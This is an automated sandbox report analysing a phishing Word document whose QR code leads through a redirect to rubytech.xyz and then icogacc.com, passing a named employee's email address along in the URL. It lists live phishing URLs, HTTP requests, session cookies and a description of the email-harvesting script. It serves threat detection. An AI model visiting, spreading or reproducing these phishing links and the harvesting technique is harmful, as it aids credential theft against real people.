Edit tour

Windows Analysis Report
mitel.docx

Overview

General Information

Sample name:	mitel.docx
Analysis ID:	1591422
MD5:	23beeecf983235201c815dd316cc03bc
SHA1:	65f9f73aa09823f590a0e1d17db8133b8f45e01e
SHA256:	daa1e43c59c142ddea9b13c28d853b72c53f6d3ef198c3212e52a3812df3e88a
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected landing page (webpage, office document or email)

AI detected suspicious Javascript

Found suspicious QR code URL

Performs DNS queries to domains with low reputation

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Drops PE files

Drops PE files to the windows directory (C:\Windows)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains more sections than normal

PE file contains sections with non-standard names

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 1052 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

chrome.exe (PID: 1924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://app.supercast.com/ahoy/messages/IyOwn1xl2n6XdxToR2XV5dCRxhEvflsH/click?signature=96e743b76714148502315415a04739f234047e43&url=https://rubytech.xyz/0secure/index.html#ludmila.glinberg+mitel.com MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,9731163135795558546,14858756652436041549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected landing page (webpage, office document or email)

Source: Office document	Joe Sandbox AI: Office document contains QR code
Source: Screenshot id: 7	Joe Sandbox AI: Screenshot id: 7 contains QR code
Source: Screenshot id: 8	Joe Sandbox AI: Screenshot id: 8 contains QR code

AI detected suspicious Javascript

Source: 0.0.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://rubytech.xyz/0secure/index.html#ludmila.gl... This script exhibits several high-risk behaviors, including redirecting the user to a suspicious domain (icogacc.com) and extracting and transmitting potentially sensitive data (email address) from the URL fragment. The use of obfuscation techniques (replacing '+' with '@') further increases the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.

Found suspicious QR code URL

Source: QR Code extractor

URL: https://app.supercast.com/ahoy/messages/IyOwn1xl2n6XdxToR2XV5dCRxhEvflsH/click?signature=96e743b76714148502315415a04739f234047e43&url=https://rubytech.xyz/0secure/index.html#ludmila.glinberg+mitel.com

Source: https://icogacc.com/SITE-ID-kwtg6t7218698782/zerobot/?email=ludmila.glinberg@mitel.com

HTTP Parser: No favicon

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49792 version: TLS 1.0

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\LICENSE.txt

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:56013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:56019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:56022 version: TLS 1.2

Source:

Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.7.dr

Networking

Performs DNS queries to domains with low reputation

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: rubytech.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: rubytech.xyz

Source: global traffic

TCP traffic: 192.168.2.6:56009 -> 1.1.1.1:53

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49792 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253

Source: global traffic	HTTP traffic detected: GET /ahoy/messages/IyOwn1xl2n6XdxToR2XV5dCRxhEvflsH/click?signature=96e743b76714148502315415a04739f234047e43&url=https://rubytech.xyz/0secure/index.html HTTP/1.1Host: app.supercast.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0secure/index.html HTTP/1.1Host: rubytech.xyzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SITE-ID-kwtg6t7218698782/zerobot?email=ludmila.glinberg@mitel.com HTTP/1.1Host: icogacc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rubytech.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SITE-ID-kwtg6t7218698782/zerobot/?email=ludmila.glinberg@mitel.com HTTP/1.1Host: icogacc.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://rubytech.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: icogacc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://icogacc.com/SITE-ID-kwtg6t7218698782/zerobot/?email=ludmila.glinberg@mitel.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b7e09a0c1cc52061afa97e3d2c18fee7
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: icogacc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b7e09a0c1cc52061afa97e3d2c18fee7; XSRF-TOKEN=eyJpdiI6IkNzUm9zR283SHNLcktSRnlrcEtXQXc9PSIsInZhbHVlIjoiaXd5SHdXYlcxZkJHMUJDY3BUQ3FCNVlxdThReVJmNDB6WFNEVU1ISExxelJyZzAyeVdrVGFPZWg1aXNiQzV0cW5OLzQ4cUMrelJCRW5JdlUwQlBCLzQ2anBxZzJ2aDNXRm41d2M3c3NEQ1BWWmdRblpQdmlMUFhuaWRNcDZPa2giLCJtYWMiOiI3NDk5MmRkNDRiZmM3YmNiMDBiM2ViMzQ5ZDY5NzIyMzFkMzNmZjVlZjI0MDc4ZTQzZTE0ODQ3MTdlZTFkNmViIn0%3D; icog_anyonecancode_session=eyJpdiI6IkhoN3RhUjZnQ1hjOS9ua0dhVE05YVE9PSIsInZhbHVlIjoieWEySWZkaTFMeVBpRWZnRDZLWU5VSG1IMnliTkEvaVovbTZneWF6YVFPKzFZYkIxZTYyOTFhd3l3Ti9IOUN2aXVQTHM0Sm4zNnNSRE85aWJMR2I2eXFmYStLeDAzcnNoaStaNS9XZ1BKbTFNM0RPWDRxNk05VXkrTGw5dnZkS3AiLCJtYWMiOiIxN2U0MDI4NWMxMDQ1YjNhZDQ5OTdhN2Y5YmViY2JhNzY3YmQyYTE2YWEyMGI0MjZiNGQwM2RmMDVkNTY0OWVlIn0%3D

Source: global traffic	DNS traffic detected: DNS query: app.supercast.com
Source: global traffic	DNS traffic detected: DNS query: rubytech.xyz
Source: global traffic	DNS traffic detected: DNS query: icogacc.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Google.Widevine.CDM.dll.7.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: sets.json.7.dr	String found in binary or memory: https://07c225f3.online
Source: sets.json.7.dr	String found in binary or memory: https://24.hu
Source: sets.json.7.dr	String found in binary or memory: https://aajtak.in
Source: sets.json.7.dr	String found in binary or memory: https://abczdrowie.pl
Source: sets.json.7.dr	String found in binary or memory: https://alice.tw
Source: sets.json.7.dr	String found in binary or memory: https://ambitionbox.com
Source: sets.json.7.dr	String found in binary or memory: https://autobild.de
Source: sets.json.7.dr	String found in binary or memory: https://baomoi.com
Source: sets.json.7.dr	String found in binary or memory: https://bild.de
Source: sets.json.7.dr	String found in binary or memory: https://blackrock.com
Source: sets.json.7.dr	String found in binary or memory: https://blackrockadvisorelite.it
Source: sets.json.7.dr	String found in binary or memory: https://bluradio.com
Source: sets.json.7.dr	String found in binary or memory: https://bolasport.com
Source: sets.json.7.dr	String found in binary or memory: https://bonvivir.com
Source: sets.json.7.dr	String found in binary or memory: https://bumbox.com
Source: sets.json.7.dr	String found in binary or memory: https://businessinsider.com.pl
Source: sets.json.7.dr	String found in binary or memory: https://businesstoday.in
Source: sets.json.7.dr	String found in binary or memory: https://cachematrix.com
Source: sets.json.7.dr	String found in binary or memory: https://cafemedia.com
Source: sets.json.7.dr	String found in binary or memory: https://caracoltv.com
Source: sets.json.7.dr	String found in binary or memory: https://carcostadvisor.be
Source: sets.json.7.dr	String found in binary or memory: https://carcostadvisor.com
Source: sets.json.7.dr	String found in binary or memory: https://carcostadvisor.fr
Source: sets.json.7.dr	String found in binary or memory: https://cardsayings.net
Source: sets.json.7.dr	String found in binary or memory: https://chatbot.com
Source: sets.json.7.dr	String found in binary or memory: https://chennien.com
Source: sets.json.7.dr	String found in binary or memory: https://citybibleforum.org
Source: sets.json.7.dr	String found in binary or memory: https://clarosports.com
Source: sets.json.7.dr	String found in binary or memory: https://clmbtech.com
Source: sets.json.7.dr	String found in binary or memory: https://closeronline.co.uk
Source: sets.json.7.dr	String found in binary or memory: https://clubelpais.com.uy
Source: sets.json.7.dr	String found in binary or memory: https://cmxd.com.mx
Source: sets.json.7.dr	String found in binary or memory: https://cognitive-ai.ru
Source: sets.json.7.dr	String found in binary or memory: https://cognitiveai.ru
Source: sets.json.7.dr	String found in binary or memory: https://commentcamarche.com
Source: sets.json.7.dr	String found in binary or memory: https://commentcamarche.net
Source: sets.json.7.dr	String found in binary or memory: https://computerbild.de
Source: sets.json.7.dr	String found in binary or memory: https://content-loader.com
Source: sets.json.7.dr	String found in binary or memory: https://cookreactor.com
Source: LICENSE.txt.7.dr	String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.7.dr	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: sets.json.7.dr	String found in binary or memory: https://cricbuzz.com
Source: sets.json.7.dr	String found in binary or memory: https://css-load.com
Source: sets.json.7.dr	String found in binary or memory: https://deccoria.pl
Source: sets.json.7.dr	String found in binary or memory: https://deere.com
Source: sets.json.7.dr	String found in binary or memory: https://desimartini.com
Source: sets.json.7.dr	String found in binary or memory: https://dewarmsteweek.be
Source: sets.json.7.dr	String found in binary or memory: https://drimer.io
Source: sets.json.7.dr	String found in binary or memory: https://drimer.travel
Source: LICENSE.txt.7.dr	String found in binary or memory: https://easylist.to/)
Source: sets.json.7.dr	String found in binary or memory: https://economictimes.com
Source: sets.json.7.dr	String found in binary or memory: https://een.be
Source: sets.json.7.dr	String found in binary or memory: https://efront.com
Source: sets.json.7.dr	String found in binary or memory: https://eleconomista.net
Source: sets.json.7.dr	String found in binary or memory: https://elfinancierocr.com
Source: sets.json.7.dr	String found in binary or memory: https://elgrafico.com
Source: sets.json.7.dr	String found in binary or memory: https://ella.sv
Source: sets.json.7.dr	String found in binary or memory: https://elpais.com.uy
Source: sets.json.7.dr	String found in binary or memory: https://elpais.uy
Source: sets.json.7.dr	String found in binary or memory: https://etfacademy.it
Source: sets.json.7.dr	String found in binary or memory: https://eworkbookcloud.com
Source: sets.json.7.dr	String found in binary or memory: https://eworkbookrequest.com
Source: sets.json.7.dr	String found in binary or memory: https://fakt.pl
Source: sets.json.7.dr	String found in binary or memory: https://finn.no
Source: sets.json.7.dr	String found in binary or memory: https://firstlook.biz
Source: sets.json.7.dr	String found in binary or memory: https://gallito.com.uy
Source: sets.json.7.dr	String found in binary or memory: https://geforcenow.com
Source: sets.json.7.dr	String found in binary or memory: https://gettalkdesk.com
Source: LICENSE.txt.7.dr	String found in binary or memory: https://github.com/easylist)
Source: sets.json.7.dr	String found in binary or memory: https://gliadomain.com
Source: sets.json.7.dr	String found in binary or memory: https://gnttv.com
Source: sets.json.7.dr	String found in binary or memory: https://graziadaily.co.uk
Source: sets.json.7.dr	String found in binary or memory: https://grid.id
Source: sets.json.7.dr	String found in binary or memory: https://gridgames.app
Source: sets.json.7.dr	String found in binary or memory: https://growthrx.in
Source: sets.json.7.dr	String found in binary or memory: https://grupolpg.sv
Source: sets.json.7.dr	String found in binary or memory: https://gujaratijagran.com
Source: sets.json.7.dr	String found in binary or memory: https://hapara.com
Source: sets.json.7.dr	String found in binary or memory: https://hazipatika.com
Source: sets.json.7.dr	String found in binary or memory: https://hc1.com
Source: sets.json.7.dr	String found in binary or memory: https://hc1.global
Source: sets.json.7.dr	String found in binary or memory: https://hc1cas.com
Source: sets.json.7.dr	String found in binary or memory: https://hc1cas.global
Source: sets.json.7.dr	String found in binary or memory: https://healthshots.com
Source: sets.json.7.dr	String found in binary or memory: https://hearty.app
Source: sets.json.7.dr	String found in binary or memory: https://hearty.gift
Source: sets.json.7.dr	String found in binary or memory: https://hearty.me
Source: sets.json.7.dr	String found in binary or memory: https://heartymail.com
Source: sets.json.7.dr	String found in binary or memory: https://heatworld.com
Source: sets.json.7.dr	String found in binary or memory: https://helpdesk.com
Source: sets.json.7.dr	String found in binary or memory: https://hindustantimes.com
Source: sets.json.7.dr	String found in binary or memory: https://hj.rs
Source: sets.json.7.dr	String found in binary or memory: https://hjck.com
Source: sets.json.7.dr	String found in binary or memory: https://html-load.cc
Source: sets.json.7.dr	String found in binary or memory: https://html-load.com
Source: sets.json.7.dr	String found in binary or memory: https://human-talk.org
Source: chromecache_111.8.dr	String found in binary or memory: https://icogacc.com/SITE-ID-kwtg6t7218698782/zerobot?email=
Source: sets.json.7.dr	String found in binary or memory: https://idbs-cloud.com
Source: sets.json.7.dr	String found in binary or memory: https://idbs-dev.com
Source: sets.json.7.dr	String found in binary or memory: https://idbs-eworkbook.com
Source: sets.json.7.dr	String found in binary or memory: https://idbs-staging.com
Source: sets.json.7.dr	String found in binary or memory: https://img-load.com
Source: sets.json.7.dr	String found in binary or memory: https://indiatimes.com
Source: sets.json.7.dr	String found in binary or memory: https://indiatoday.in
Source: sets.json.7.dr	String found in binary or memory: https://indiatodayne.in
Source: sets.json.7.dr	String found in binary or memory: https://infoedgeindia.com
Source: sets.json.7.dr	String found in binary or memory: https://interia.pl
Source: sets.json.7.dr	String found in binary or memory: https://intoday.in
Source: sets.json.7.dr	String found in binary or memory: https://iolam.it
Source: sets.json.7.dr	String found in binary or memory: https://ishares.com
Source: sets.json.7.dr	String found in binary or memory: https://jagran.com
Source: sets.json.7.dr	String found in binary or memory: https://johndeere.com
Source: sets.json.7.dr	String found in binary or memory: https://journaldesfemmes.com
Source: sets.json.7.dr	String found in binary or memory: https://journaldesfemmes.fr
Source: sets.json.7.dr	String found in binary or memory: https://journaldunet.com
Source: sets.json.7.dr	String found in binary or memory: https://journaldunet.fr
Source: sets.json.7.dr	String found in binary or memory: https://joyreactor.cc
Source: sets.json.7.dr	String found in binary or memory: https://joyreactor.com
Source: sets.json.7.dr	String found in binary or memory: https://kaksya.in
Source: sets.json.7.dr	String found in binary or memory: https://knowledgebase.com
Source: sets.json.7.dr	String found in binary or memory: https://kompas.com
Source: sets.json.7.dr	String found in binary or memory: https://kompas.tv
Source: sets.json.7.dr	String found in binary or memory: https://kompasiana.com
Source: sets.json.7.dr	String found in binary or memory: https://lanacion.com.ar
Source: sets.json.7.dr	String found in binary or memory: https://landyrev.com
Source: sets.json.7.dr	String found in binary or memory: https://landyrev.ru
Source: sets.json.7.dr	String found in binary or memory: https://laprensagrafica.com
Source: sets.json.7.dr	String found in binary or memory: https://lateja.cr
Source: sets.json.7.dr	String found in binary or memory: https://libero.it
Source: sets.json.7.dr	String found in binary or memory: https://linternaute.com
Source: sets.json.7.dr	String found in binary or memory: https://linternaute.fr
Source: sets.json.7.dr	String found in binary or memory: https://livechat.com
Source: sets.json.7.dr	String found in binary or memory: https://livechatinc.com
Source: sets.json.7.dr	String found in binary or memory: https://livehindustan.com
Source: sets.json.7.dr	String found in binary or memory: https://livemint.com
Source: sets.json.7.dr	String found in binary or memory: https://max.auto
Source: sets.json.7.dr	String found in binary or memory: https://medonet.pl
Source: sets.json.7.dr	String found in binary or memory: https://meo.pt
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.cl
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.co.cr
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.ar
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.bo
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.co
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.do
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.ec
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.gt
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.hn
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.mx
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.ni
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.pa
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.pe
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.py
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.sv
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.uy
Source: sets.json.7.dr	String found in binary or memory: https://mercadolibre.com.ve
Source: sets.json.7.dr	String found in binary or memory: https://mercadolivre.com
Source: sets.json.7.dr	String found in binary or memory: https://mercadolivre.com.br
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.cl
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.com
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.com.ar
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.com.br
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.com.co
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.com.ec
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.com.mx
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.com.pe
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.com.uy
Source: sets.json.7.dr	String found in binary or memory: https://mercadopago.com.ve
Source: sets.json.7.dr	String found in binary or memory: https://mercadoshops.cl
Source: sets.json.7.dr	String found in binary or memory: https://mercadoshops.com
Source: sets.json.7.dr	String found in binary or memory: https://mercadoshops.com.ar
Source: sets.json.7.dr	String found in binary or memory: https://mercadoshops.com.br
Source: sets.json.7.dr	String found in binary or memory: https://mercadoshops.com.co
Source: sets.json.7.dr	String found in binary or memory: https://mercadoshops.com.mx
Source: sets.json.7.dr	String found in binary or memory: https://mighty-app.appspot.com
Source: sets.json.7.dr	String found in binary or memory: https://mightytext.net
Source: sets.json.7.dr	String found in binary or memory: https://mittanbud.no
Source: sets.json.7.dr	String found in binary or memory: https://money.pl
Source: sets.json.7.dr	String found in binary or memory: https://motherandbaby.com
Source: sets.json.7.dr	String found in binary or memory: https://mystudentdashboard.com
Source: sets.json.7.dr	String found in binary or memory: https://nacion.com
Source: sets.json.7.dr	String found in binary or memory: https://naukri.com
Source: sets.json.7.dr	String found in binary or memory: https://nidhiacademyonline.com
Source: sets.json.7.dr	String found in binary or memory: https://nien.co
Source: sets.json.7.dr	String found in binary or memory: https://nien.com
Source: sets.json.7.dr	String found in binary or memory: https://nien.org
Source: sets.json.7.dr	String found in binary or memory: https://nlc.hu
Source: sets.json.7.dr	String found in binary or memory: https://nosalty.hu
Source: sets.json.7.dr	String found in binary or memory: https://noticiascaracol.com
Source: sets.json.7.dr	String found in binary or memory: https://nourishingpursuits.com
Source: sets.json.7.dr	String found in binary or memory: https://nvidia.com
Source: sets.json.7.dr	String found in binary or memory: https://o2.pl
Source: sets.json.7.dr	String found in binary or memory: https://ocdn.eu
Source: sets.json.7.dr	String found in binary or memory: https://onet.pl
Source: sets.json.7.dr	String found in binary or memory: https://ottplay.com
Source: sets.json.7.dr	String found in binary or memory: https://p106.net
Source: sets.json.7.dr	String found in binary or memory: https://p24.hu
Source: sets.json.7.dr	String found in binary or memory: https://paula.com.uy
Source: sets.json.7.dr	String found in binary or memory: https://pdmp-apis.no
Source: sets.json.7.dr	String found in binary or memory: https://phonandroid.com
